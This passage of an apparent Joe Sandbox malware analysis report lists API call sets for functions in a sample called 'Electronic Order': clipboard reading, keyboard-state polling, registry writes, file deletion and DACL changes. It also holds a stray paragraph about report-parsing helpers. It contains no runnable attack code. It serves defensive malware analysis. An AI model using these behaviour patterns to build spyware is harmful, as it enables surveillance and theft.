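• OpenClipboard.USER32(00E4F910), ref: 00E34284
• IsClipboardFormatAvailable.USER32(0000000D), ref: 00E34292
• GetClipboardData.USER32(0000000D), ref: 00E3429A
• CloseClipboard.USER32 ref: 00E342A6
• GlobalLock.KERNEL32(00000000), ref: 00E342C2
• CloseClipboard.USER32 ref: 00E34447
Memory Dump Source
• Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
• Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Similarity
• API ID: Clipboard$Global$Close$AvailableDataFormatLockUnlock$Open
• Instruction Fuzzy Hash: 2C517E75204206AFD311AB61EC99F6F7BA8AF85B00F014529F556F31F1DF70A909CB62
"""
```

Feed the whole function listing of a report to `parse_records` and `unbacked_code` returns the records whose dump has no PE image behind it; the `Instruction Fuzzy Hash` values kept in `fields` are the natural key for matching those functions against other samples, and `calls(name)` gives the call sites to set breakpoints on when the dump is reloaded in a debugger.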
                                      APIs
                                      • FindFirstFileW.KERNEL32(?,?), ref: 00E2C9F8
                                      • FindClose.KERNEL32(00000000), ref: 00E2CA4C
                                      • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00E2CA71
                                      • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00E2CA88
                                      • FileTimeToSystemTime.KERNEL32(?,?), ref: 00E2CAAF
                                      • __swprintf.LIBCMT ref: 00E2CAFB
                                      • __swprintf.LIBCMT ref: 00E2CB3E
                                        • Part of subcall function 00DC7F41: _memmove.LIBCMT ref: 00DC7F82
                                      • __swprintf.LIBCMT ref: 00E2CB92
                                        • Part of subcall function 00DE38D8: __woutput_l.LIBCMT ref: 00DE3931
                                      • __swprintf.LIBCMT ref: 00E2CBE0
                                        • Part of subcall function 00DE38D8: __flsbuf.LIBCMT ref: 00DE3953
                                        • Part of subcall function 00DE38D8: __flsbuf.LIBCMT ref: 00DE396B
                                      • __swprintf.LIBCMT ref: 00E2CC2F
                                      • __swprintf.LIBCMT ref: 00E2CC7E
                                      • __swprintf.LIBCMT ref: 00E2CCCD
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                       • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: __swprintf$FileTime$FindLocal__flsbuf$CloseFirstSystem__woutput_l_memmove
                                      • String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
                                      • API String ID: 3953360268-2428617273
                                      • Opcode ID: 7dbb475dc7caf35aaf7c07d3e1fe4d21e1d3229b525a0ec08cc6466348389e51
                                      • Instruction ID: 0af82fa80693394a488583af410dcc1bce2dea529e3c0baaa3eff840e4e0a22a
                                      • Opcode Fuzzy Hash: 7dbb475dc7caf35aaf7c07d3e1fe4d21e1d3229b525a0ec08cc6466348389e51
                                      • Instruction Fuzzy Hash: 4DA13DB1508345ABC700EBA5D895EAFB7ECEF94700F40492DF586D3191EA34EA09CB72
                                      APIs
                                      • FindFirstFileW.KERNEL32(?,?,76228FB0,?,00000000), ref: 00E2F221
                                      • _wcscmp.LIBCMT ref: 00E2F236
                                      • _wcscmp.LIBCMT ref: 00E2F24D
                                      • GetFileAttributesW.KERNEL32(?), ref: 00E2F25F
                                      • SetFileAttributesW.KERNEL32(?,?), ref: 00E2F279
                                      • FindNextFileW.KERNEL32(00000000,?), ref: 00E2F291
                                      • FindClose.KERNEL32(00000000), ref: 00E2F29C
                                      • FindFirstFileW.KERNEL32(*.*,?), ref: 00E2F2B8
                                      • _wcscmp.LIBCMT ref: 00E2F2DF
                                      • _wcscmp.LIBCMT ref: 00E2F2F6
                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 00E2F308
                                      • SetCurrentDirectoryW.KERNEL32(00E7A5A0), ref: 00E2F326
                                      • FindNextFileW.KERNEL32(00000000,00000010), ref: 00E2F330
                                      • FindClose.KERNEL32(00000000), ref: 00E2F33D
                                      • FindClose.KERNEL32(00000000), ref: 00E2F34F
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                       • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: Find$File$_wcscmp$Close$AttributesCurrentDirectoryFirstNext
                                      • String ID: *.*
                                      • API String ID: 1803514871-438819550
                                      • Opcode ID: 51c2d9902e6d54cb1882cc7c8bb036f01219bee229580b05960f0bd81e9b3862
                                      • Instruction ID: 9f14e40c1836ded3268560e5ad7fcac15341392b81b25bb25e9c1159dfaf9629
                                      • Opcode Fuzzy Hash: 51c2d9902e6d54cb1882cc7c8bb036f01219bee229580b05960f0bd81e9b3862
                                      • Instruction Fuzzy Hash: AD31D4765002296FDB10EFB1EC58AEE77BC9F4A725F145175E804F30A0EB70DA458B64
                                      APIs
                                      • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00E40BDE
                                      • RegCreateKeyExW.ADVAPI32(?,?,00000000,00E4F910,00000000,?,00000000,?,?), ref: 00E40C4C
                                      • RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 00E40C94
                                      • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 00E40D1D
                                      • RegCloseKey.ADVAPI32(?), ref: 00E4103D
                                      • RegCloseKey.ADVAPI32(00000000), ref: 00E4104A
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                       • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: Close$ConnectCreateRegistryValue
                                      • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                      • API String ID: 536824911-966354055
                                      • Opcode ID: 3dc7e65f8fb0c0ecf8e9bccd829debe94ef59e3c9194c635a71d82582cb7485a
                                      • Instruction ID: 53e3b6940252dfea9af3ebb838f1d860d14956422988a908feba7aaa4336e2fe
                                      • Opcode Fuzzy Hash: 3dc7e65f8fb0c0ecf8e9bccd829debe94ef59e3c9194c635a71d82582cb7485a
                                      • Instruction Fuzzy Hash: CF028E352006019FCB14EF25D895E2AB7E5FF88714F05985DF98AAB362CB30EC45CB61
                                      APIs
                                      • FindFirstFileW.KERNEL32(?,?,76228FB0,?,00000000), ref: 00E2F37E
                                      • _wcscmp.LIBCMT ref: 00E2F393
                                      • _wcscmp.LIBCMT ref: 00E2F3AA
                                        • Part of subcall function 00E245C1: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 00E245DC
                                      • FindNextFileW.KERNEL32(00000000,?), ref: 00E2F3D9
                                      • FindClose.KERNEL32(00000000), ref: 00E2F3E4
                                      • FindFirstFileW.KERNEL32(*.*,?), ref: 00E2F400
                                      • _wcscmp.LIBCMT ref: 00E2F427
                                      • _wcscmp.LIBCMT ref: 00E2F43E
                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 00E2F450
                                      • SetCurrentDirectoryW.KERNEL32(00E7A5A0), ref: 00E2F46E
                                      • FindNextFileW.KERNEL32(00000000,00000010), ref: 00E2F478
                                      • FindClose.KERNEL32(00000000), ref: 00E2F485
                                      • FindClose.KERNEL32(00000000), ref: 00E2F497
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: Find$File$_wcscmp$Close$CurrentDirectoryFirstNext$Create
                                      • String ID: *.*
                                      • API String ID: 1824444939-438819550
                                      • Opcode ID: a4b02ccd56dca1dc47ce4a2af8ddb4aee88dc8f404ee2b4c55ce5f85c15f9064
                                      • Instruction ID: c957365b65eb5774212fd8171c52d88e414a07cb0453832dc76c7d0991838d3a
                                      • Opcode Fuzzy Hash: a4b02ccd56dca1dc47ce4a2af8ddb4aee88dc8f404ee2b4c55ce5f85c15f9064
                                      • Instruction Fuzzy Hash: 1131F2765002296FCB10FFA5FC88AEE77BC9F49725F145275E814B30A0DBB0DA45CA64
                                      APIs
                                        • Part of subcall function 00E1874A: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00E18766
                                        • Part of subcall function 00E1874A: GetLastError.KERNEL32(?,00E1822A,?,?,?), ref: 00E18770
                                        • Part of subcall function 00E1874A: GetProcessHeap.KERNEL32(00000008,?,?,00E1822A,?,?,?), ref: 00E1877F
                                        • Part of subcall function 00E1874A: HeapAlloc.KERNEL32(00000000,?,00E1822A,?,?,?), ref: 00E18786
                                        • Part of subcall function 00E1874A: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00E1879D
                                        • Part of subcall function 00E187E7: GetProcessHeap.KERNEL32(00000008,00E18240,00000000,00000000,?,00E18240,?), ref: 00E187F3
                                        • Part of subcall function 00E187E7: HeapAlloc.KERNEL32(00000000,?,00E18240,?), ref: 00E187FA
                                        • Part of subcall function 00E187E7: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00E18240,?), ref: 00E1880B
                                      • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00E1825B
                                      • _memset.LIBCMT ref: 00E18270
                                      • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00E1828F
                                      • GetLengthSid.ADVAPI32(?), ref: 00E182A0
                                      • GetAce.ADVAPI32(?,00000000,?), ref: 00E182DD
                                      • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00E182F9
                                      • GetLengthSid.ADVAPI32(?), ref: 00E18316
                                      • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 00E18325
                                      • HeapAlloc.KERNEL32(00000000), ref: 00E1832C
                                      • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00E1834D
                                      • CopySid.ADVAPI32(00000000), ref: 00E18354
                                      • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00E18385
                                      • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00E183AB
                                      • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00E183BF
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                                      • String ID:
                                      • API String ID: 3996160137-0
                                      • Opcode ID: a3b639d86cb5ad5b3b6c635e867ea8de9ff2f03e80dff94a6684817ed0e3df16
                                      • Instruction ID: 1e89bec27988e533b344c33f3287a901de6b843c5585d379a9213c2ae5fa6196
                                      • Opcode Fuzzy Hash: a3b639d86cb5ad5b3b6c635e867ea8de9ff2f03e80dff94a6684817ed0e3df16
                                      • Instruction Fuzzy Hash: 55616975900209AFDF049FA1DD84AEEBBB9FF04704F04916AE825B6291DB309A45DB60
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: ANY)$ANYCRLF)$BSR_ANYCRLF)$BSR_UNICODE)$CR)$CRLF)$LF)$LIMIT_MATCH=$LIMIT_RECURSION=$NO_AUTO_POSSESS)$NO_START_OPT)$PJ$UCP)$UTF)$UTF16)
                                      • API String ID: 0-1624373025
                                      • Opcode ID: da212ef6f6dbaf3fb58b5e9a0806c9711cdba063232acc79377ff7a08f614bc0
                                      • Instruction ID: 874c362223d1b2043422f9e4f7f359ff261652e576f9c0f54c33085f25cee0ce
                                      • Opcode Fuzzy Hash: da212ef6f6dbaf3fb58b5e9a0806c9711cdba063232acc79377ff7a08f614bc0
                                      • Instruction Fuzzy Hash: 44725E75E002199BDB24CF59D8807EEB7B5EF88710F1491ABE959FB380D7709981CBA0
                                      APIs
                                        • Part of subcall function 00E410A5: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00E40038,?,?), ref: 00E410BC
                                      • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00E40737
                                        • Part of subcall function 00DC9997: __itow.LIBCMT ref: 00DC99C2
                                        • Part of subcall function 00DC9997: __swprintf.LIBCMT ref: 00DC9A0C
                                      • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 00E407D6
                                      • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 00E4086E
                                      • RegCloseKey.ADVAPI32(000000FE,000000FE,00000000,?,00000000), ref: 00E40AAD
                                      • RegCloseKey.ADVAPI32(00000000), ref: 00E40ABA
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: CloseQueryValue$BuffCharConnectRegistryUpper__itow__swprintf
                                      • String ID:
                                      • API String ID: 1240663315-0
                                      • Opcode ID: 8fc471c228c4345d64986f983f35faeddadb111523376ddf8da5f4e95e0d68c8
                                      • Instruction ID: c3f640932be3541b1541ae679c1ef1a41583b8355a4ef1c5c0ff3277dbd8c59d
                                      • Opcode Fuzzy Hash: 8fc471c228c4345d64986f983f35faeddadb111523376ddf8da5f4e95e0d68c8
                                      • Instruction Fuzzy Hash: 2EE17D31204311AFCB14DF25D895E6ABBE4EF89714F04986DF54AEB2A2DB30ED05CB61
                                      APIs
                                      • GetKeyboardState.USER32(?), ref: 00E20241
                                      • GetAsyncKeyState.USER32(000000A0), ref: 00E202C2
                                      • GetKeyState.USER32(000000A0), ref: 00E202DD
                                      • GetAsyncKeyState.USER32(000000A1), ref: 00E202F7
                                      • GetKeyState.USER32(000000A1), ref: 00E2030C
                                      • GetAsyncKeyState.USER32(00000011), ref: 00E20324
                                      • GetKeyState.USER32(00000011), ref: 00E20336
                                      • GetAsyncKeyState.USER32(00000012), ref: 00E2034E
                                      • GetKeyState.USER32(00000012), ref: 00E20360
                                      • GetAsyncKeyState.USER32(0000005B), ref: 00E20378
                                      • GetKeyState.USER32(0000005B), ref: 00E2038A
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: State$Async$Keyboard
                                      • String ID:
                                      • API String ID: 541375521-0
                                      • Opcode ID: 42d45c8702a56434b5ec5c06ee816d267b9b83b193bb70e14a90907b0a1859b1
                                      • Instruction ID: 12004de3c3dcabf2992217822e478ca92a0ce56b109d1c41968d5c5bc2ec7e66
                                      • Opcode Fuzzy Hash: 42d45c8702a56434b5ec5c06ee816d267b9b83b193bb70e14a90907b0a1859b1
                                      • Instruction Fuzzy Hash: 5941A8345047E9AFFF31DB64A8083A5BFA06F16348F08509ED5C6761D3EBA45DC887A2
                                      APIs
                                        • Part of subcall function 00DC9997: __itow.LIBCMT ref: 00DC99C2
                                        • Part of subcall function 00DC9997: __swprintf.LIBCMT ref: 00DC9A0C
                                      • CoInitialize.OLE32 ref: 00E38718
                                      • CoUninitialize.OLE32 ref: 00E38723
                                      • CoCreateInstance.OLE32(?,00000000,00000017,00E52BEC,?), ref: 00E38783
                                      • IIDFromString.OLE32(?,?), ref: 00E387F6
                                      • VariantInit.OLEAUT32(?), ref: 00E38890
                                      • VariantClear.OLEAUT32(?), ref: 00E388F1
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize__itow__swprintf
                                      • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                      • API String ID: 834269672-1287834457
                                      • Opcode ID: 8ab28a1e459eece3f83642b1696ddb1add9e4e175f131c788e266ce4462a1d8d
                                      • Instruction ID: 434c2006c432392e58df4637ebf258f88d8b79247a71eed9a2a8eb26b9ffbd61
                                      • Opcode Fuzzy Hash: 8ab28a1e459eece3f83642b1696ddb1add9e4e175f131c788e266ce4462a1d8d
                                      • Instruction Fuzzy Hash: 4E61BF706083019FD714DF24CA48F6ABBE4EF89714F54581EF985AB291CB70ED48CBA2
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                      • String ID:
                                      • API String ID: 1737998785-0
                                      • Opcode ID: d39bece8e40c5c93a6301b57ba829d676461697a4cf13ceb37e51a58b3e1d84c
                                      • Instruction ID: 6016150ea625f68e97e28b330422539a26c130c36120aced48e6c0971ababe71
                                      • Opcode Fuzzy Hash: d39bece8e40c5c93a6301b57ba829d676461697a4cf13ceb37e51a58b3e1d84c
                                      • Instruction Fuzzy Hash: 3621B779200611AFDB119F21EC1DF6D7BA8EF05B15F11806AF94AE72B1CB70AC01CB94
                                      APIs
                                        • Part of subcall function 00DC48AE: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00DC48A1,?,?,00DC37C0,?), ref: 00DC48CE
                                        • Part of subcall function 00E24CD3: GetFileAttributesW.KERNEL32(?,00E23947), ref: 00E24CD4
                                      • FindFirstFileW.KERNEL32(?,?), ref: 00E23ADF
                                      • DeleteFileW.KERNEL32(?,?,00000000,?,?,?,?), ref: 00E23B87
                                      • MoveFileW.KERNEL32(?,?), ref: 00E23B9A
                                      • DeleteFileW.KERNEL32(?,?,?,?,?), ref: 00E23BB7
                                      • FindNextFileW.KERNEL32(00000000,00000010), ref: 00E23BD9
                                      • FindClose.KERNEL32(00000000,?,?,?,?), ref: 00E23BF5
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: File$Find$Delete$AttributesCloseFirstFullMoveNameNextPath
                                      • String ID: \*.*
                                      • API String ID: 4002782344-1173974218
                                      • Opcode ID: dc53b0ef7543420e3750dd8de099858bc6c07c4a4475ecb1196c7259c6932a6b
                                      • Instruction ID: 12e4607b88c7f1c77a13444aa3131e5c7cd2cf8e91d4780935bb73ee09162b70
                                      • Opcode Fuzzy Hash: dc53b0ef7543420e3750dd8de099858bc6c07c4a4475ecb1196c7259c6932a6b
                                      • Instruction Fuzzy Hash: 17516B3180115EAACF05EBA1EE92EEDB7B9AF14304F2451A9E40277091DF246F09CFB0
                                      APIs
                                        • Part of subcall function 00DC7F41: _memmove.LIBCMT ref: 00DC7F82
                                      • FindFirstFileW.KERNEL32(?,?,*.*,?,?,00000000,00000000), ref: 00E2F6AB
                                      • Sleep.KERNEL32(0000000A), ref: 00E2F6DB
                                      • _wcscmp.LIBCMT ref: 00E2F6EF
                                      • _wcscmp.LIBCMT ref: 00E2F70A
                                      • FindNextFileW.KERNEL32(?,?), ref: 00E2F7A8
                                      • FindClose.KERNEL32(00000000), ref: 00E2F7BE
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: Find$File_wcscmp$CloseFirstNextSleep_memmove
                                      • String ID: *.*
                                      • API String ID: 713712311-438819550
                                      • Opcode ID: 4c404bc6f58c92c2ea23bbb2497278292954d1cff27103dc11b050a408753f13
                                      • Instruction ID: 096ea782704f0fcb2447691dc786dd21dae984c6892f772a9630d07dd3dd8eb9
                                      • Opcode Fuzzy Hash: 4c404bc6f58c92c2ea23bbb2497278292954d1cff27103dc11b050a408753f13
                                      • Instruction Fuzzy Hash: 65414B7591021A9FCB11EF64DC89AEEBBB4FF05314F14457AE815B31A1DB309A44CBA0
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: ERCP$VUUU$VUUU$VUUU$VUUU
                                      • API String ID: 0-1546025612
                                      • Opcode ID: baf168b0d1049eaca349a376d1ea8cfbe06788dc820cc918c2b0b28a8ea5b062
                                      • Instruction ID: 8295695351b202e372a36b84afe8d4d09c7eaf0b75a4c9021c6dea168519902e
                                      • Opcode Fuzzy Hash: baf168b0d1049eaca349a376d1ea8cfbe06788dc820cc918c2b0b28a8ea5b062
                                      • Instruction Fuzzy Hash: A3A25C74E0421A8BDF24CF58C9907ADB7B1BF55314F1481AAD89AA7380D770AEC5DFA0
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: _memmove
                                      • String ID:
                                      • API String ID: 4104443479-0
